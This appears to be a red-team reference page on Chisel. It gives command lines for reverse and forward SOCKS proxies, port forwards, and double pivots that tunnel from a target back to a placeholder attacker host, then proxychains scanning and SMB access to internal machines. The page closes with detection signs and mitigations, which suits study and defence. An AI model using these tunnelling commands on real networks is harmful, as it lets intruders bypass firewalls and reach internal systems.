Chisel
Overview
Chisel is a TCP/UDP tunnel transported over HTTP with SSH encryption. It creates tunnels through firewalls by encapsulating traffic in HTTP, making it effective in environments where only web traffic is allowed. Chisel supports forward tunnels, reverse tunnels, and SOCKS proxies. A single binary runs on both client and server — transfer it to the target for pivoting.
ATT&CK Mapping
- Tactic: TA0011 - Command and Control
- Technique: T1572 - Protocol Tunneling
Prerequisites
- Chisel binary on both attacker and target (single Go binary, no dependencies)
- Network connectivity between target and attacker (HTTP/HTTPS)
- On Kali:
sudo apt install -y chisel
Techniques
Reverse SOCKS Proxy (Most Common)
Route all traffic through the target to reach internal networks:
On attacker (server):
# Chisel
# https://github.com/jpillora/chisel
chisel server --reverse --port 8080
On target (client):
# Chisel
# https://github.com/jpillora/chisel
chisel client <attacker_ip>:8080 R:socks
This creates a SOCKS5 proxy on the attacker at 127.0.0.1:1080. Use with proxychains:
# Configure proxychains: socks5 127.0.0.1 1080
proxychains nmap -sT -Pn -p 445 <internal_target>
proxychains nxc smb <internal_target> -u <user> -p <password>
Reverse SOCKS on Custom Port
# On attacker
chisel server --reverse --port 8080
# On target — SOCKS proxy on port 9050 instead of 1080
chisel client <attacker_ip>:8080 R:9050:socks
Reverse Port Forward
Expose a specific internal service on the attacker:
# On attacker
chisel server --reverse --port 8080
# On target — forward internal RDP to attacker's port 3389
chisel client <attacker_ip>:8080 R:3389:<internal_target>:3389
# On target — forward internal web server to attacker's port 8888
chisel client <attacker_ip>:8080 R:8888:<internal_target>:80
Multiple forwards in one connection:
# On target
chisel client <attacker_ip>:8080 R:3389:<dc>:3389 R:445:<dc>:445 R:socks
Forward SOCKS Proxy
When the target can accept inbound connections:
On target (server):
# Chisel
# https://github.com/jpillora/chisel
chisel server --socks5 --port 8080
On attacker (client):
# Chisel
# https://github.com/jpillora/chisel
chisel client <target_ip>:8080 socks
Forward Port Forwarding
# On target (server)
chisel server --port 8080
# On attacker (client) — access target's port 80 on local port 8888
chisel client <target_ip>:8080 8888:localhost:80
Double Pivot
Chain chisel through multiple hosts:
# Attacker → Pivot1 → Pivot2 → Internal network
# On attacker
chisel server --reverse --port 8080
# On Pivot1 (connects back to attacker, opens SOCKS)
chisel client <attacker>:8080 R:1080:socks
# On Pivot1 (also runs a server for Pivot2)
chisel server --reverse --port 9090
# On Pivot2 (connects back to Pivot1, opens SOCKS)
chisel client <pivot1>:9090 R:1081:socks
# On attacker, chain proxies in proxychains4.conf:
# strict_chain
# [ProxyList]
# socks5 127.0.0.1 1080
# socks5 127.0.0.1 1081
Detection Methods
Network-Based Detection
- HTTP traffic with WebSocket upgrade headers to non-standard ports
- Sustained HTTP connections with consistent bidirectional data transfer
- HTTP connections to external IPs that don't match normal web browsing
Host-Based Detection
- Unknown binary named
chiselrunning on endpoints - Process with
--reverseorR:socksin command line arguments - Unusual outbound HTTP connections from servers
Mitigation Strategies
- Application whitelisting — prevent execution of unauthorized binaries
- Egress filtering — restrict outbound HTTP connections from servers to known destinations
- Network monitoring — detect WebSocket upgrade requests to non-web servers
- Deep packet inspection — identify tunneled traffic inside HTTP connections